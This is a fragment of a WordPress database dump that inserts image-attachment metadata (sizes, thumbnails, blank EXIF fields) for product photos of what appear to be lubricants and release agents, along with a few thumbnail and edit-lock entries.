INSERT INTO `wp_postmeta` VALUES (17632, 1779, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:23:"2016/09/Releasys-85.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Releasys-85-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"Releasys-85-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"Releasys-85-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"Releasys-85-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Releasys-85-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Releasys-85-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Releasys-85-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"Releasys-85-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17633, 1780, '_wp_attached_file', '2016/09/releasys-88.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17634, 1780, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:23:"2016/09/releasys-88.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"releasys-88-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"releasys-88-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"releasys-88-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"releasys-88-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"releasys-88-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"releasys-88-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"releasys-88-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"releasys-88-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17635, 1781, '_wp_attached_file', '2016/09/Releasys-89.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17636, 1781, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:23:"2016/09/Releasys-89.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Releasys-89-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"Releasys-89-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"Releasys-89-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"Releasys-89-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Releasys-89-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Releasys-89-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Releasys-89-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"Releasys-89-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17637, 1782, '_wp_attached_file', '2016/09/Releasys-8200.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17638, 1782, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/09/Releasys-8200.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"Releasys-8200-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"Releasys-8200-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"Releasys-8200-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"Releasys-8200-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"Releasys-8200-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"Releasys-8200-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"Releasys-8200-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"Releasys-8200-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17639, 1783, '_wp_attached_file', '2016/09/H0805A.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17640, 1783, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/H0805A.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"H0805A-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"H0805A-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"H0805A-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"H0805A-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"H0805A-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"H0805A-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"H0805A-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"H0805A-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17641, 1784, '_wp_attached_file', '2016/09/Teflon-Silicone-lubricant-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17642, 1784, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/Teflon-Silicone-lubricant-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"Teflon-Silicone-lubricant-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"Teflon-Silicone-lubricant-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"Teflon-Silicone-lubricant-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"Teflon-Silicone-lubricant-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"Teflon-Silicone-lubricant-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"Teflon-Silicone-lubricant-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"Teflon-Silicone-lubricant-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"Teflon-Silicone-lubricant-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17643, 1785, '_wp_attached_file', '2016/09/ReleaSys-8500.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17644, 1785, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/09/ReleaSys-8500.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8500-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"ReleaSys-8500-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"ReleaSys-8500-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"ReleaSys-8500-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8500-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8500-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"ReleaSys-8500-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"ReleaSys-8500-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17645, 1786, '_wp_attached_file', '2016/09/ReleaSys-8800.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17646, 1786, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/09/ReleaSys-8800.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8800-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"ReleaSys-8800-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"ReleaSys-8800-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"ReleaSys-8800-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8800-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8800-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"ReleaSys-8800-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"ReleaSys-8800-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17647, 1787, '_wp_attached_file', '2016/09/Releasys-8900.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17648, 1787, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/09/Releasys-8900.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"Releasys-8900-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"Releasys-8900-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"Releasys-8900-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"Releasys-8900-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"Releasys-8900-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"Releasys-8900-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"Releasys-8900-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"Releasys-8900-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17649, 1788, '_wp_attached_file', '2016/09/Silicone-oil-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17650, 1788, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/09/Silicone-oil-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"Silicone-oil-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"Silicone-oil-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"Silicone-oil-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"Silicone-oil-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"Silicone-oil-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"Silicone-oil-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"Silicone-oil-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"Silicone-oil-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17651, 1789, '_wp_attached_file', '2016/09/Teflon-multi-use.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17652, 1789, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:28:"2016/09/Teflon-multi-use.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"Teflon-multi-use-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"Teflon-multi-use-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"Teflon-multi-use-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"Teflon-multi-use-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"Teflon-multi-use-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"Teflon-multi-use-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"Teflon-multi-use-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"Teflon-multi-use-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17653, 1790, '_wp_attached_file', '2016/09/Teflone-Multi-use.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17654, 1790, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:29:"2016/09/Teflone-Multi-use.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"Teflone-Multi-use-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"Teflone-Multi-use-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"Teflone-Multi-use-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"Teflone-Multi-use-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"Teflone-Multi-use-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"Teflone-Multi-use-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"Teflone-Multi-use-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"Teflone-Multi-use-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17655, 308, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17656, 308, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17657, 308, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17658, 1711, '_thumbnail_id', '1745'); 
INSERT INTO `wp_postmeta` VALUES (17659, 1712, '_thumbnail_id', '1746'); 
INSERT INTO `wp_postmeta` VALUES (17661, 1792, '_wp_attached_file', '2016/08/krytox-authorized-distributor-e1474290608761.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17662, 1792, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:250;s:6:"height";i:198;s:4:"file";s:56:"2016/08/krytox-authorized-distributor-e1474290608761.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:56:"krytox-authorized-distributor-e1474290608761-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:56:"krytox-authorized-distributor-e1474290608761-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:56:"krytox-authorized-distributor-e1474290608761-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17663, 1792, '_edit_lock', '1474290466:2'); 
